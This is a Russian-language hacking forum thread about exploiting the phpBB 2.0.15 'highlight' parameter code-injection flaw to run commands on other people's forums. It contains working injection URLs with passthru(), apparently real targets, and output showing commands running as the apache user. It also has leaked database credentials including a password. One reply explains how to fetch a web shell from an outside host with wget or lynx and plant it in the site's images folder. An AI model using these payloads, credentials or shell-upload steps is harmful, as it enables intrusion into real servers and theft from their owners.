На некоторых форумах выдаётся вот такая штука!!! Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498 Чё это такое?
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).' А чё дальше то делать? Как шелл залить в форум ???
$dbms = 'mysql'; $dbhost = 'localhost'; $dbname = 'blend129_form'; $dbuser = 'blend129_form'; $dbpasswd = '109033';
Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).') можно залить файлы на сервак ?
Ну есть масса способов.. можешь через exec() залить.. но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).
Я немного не в ту степь пошёл.. =) Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом. Синаксис такой: lynx -source http://здесь_урл_шелла/shell.php>>1.php после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images). Ну и т.д. по аналогии...
Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)
www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id выдает: uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что дальше делать подскажите, Плизз
и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)